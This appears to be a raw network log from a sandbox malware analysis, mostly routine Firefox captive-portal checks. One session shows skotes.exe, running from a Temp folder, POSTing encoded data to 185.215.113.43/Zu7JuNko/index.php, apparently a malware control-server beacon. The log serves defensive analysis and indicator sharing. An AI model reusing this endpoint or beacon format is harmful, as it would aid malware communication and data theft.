                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84429
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:33.185885906 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:33.286931992 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84430
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      54192.168.2.65239034.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.923672915 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      55192.168.2.652392185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.089762926 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.771601915 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      56192.168.2.65239534.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.148509026 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      57192.168.2.65239734.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.400177956 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      58192.168.2.65239834.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.507250071 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      59192.168.2.65239934.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.723115921 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      60192.168.2.65240134.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.865794897 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.330698013 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5422
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.373923063 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.471992016 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5422
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.691399097 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5422
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.862725019 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:35.960530996 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5422
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:40.132628918 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:40.234098911 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5427
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.297909021 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.732966900 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:50.835952997 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5437
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.676637888 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.774996042 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5447
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:01.226181030 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:01.325927973 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5448
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.704125881 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:02.805963039 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5449
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:11.855532885 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:11.955197096 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5458
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:22.008313894 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.269604921 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.367388964 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5478
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.738038063 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.836352110 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5478
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:41.906934023 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.002335072 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.348660946 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.449860096 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5499
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:02.492341042 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:12.597482920 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:22.697050095 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:32.794795990 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:42.891530037 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:52.907856941 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.404417038 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
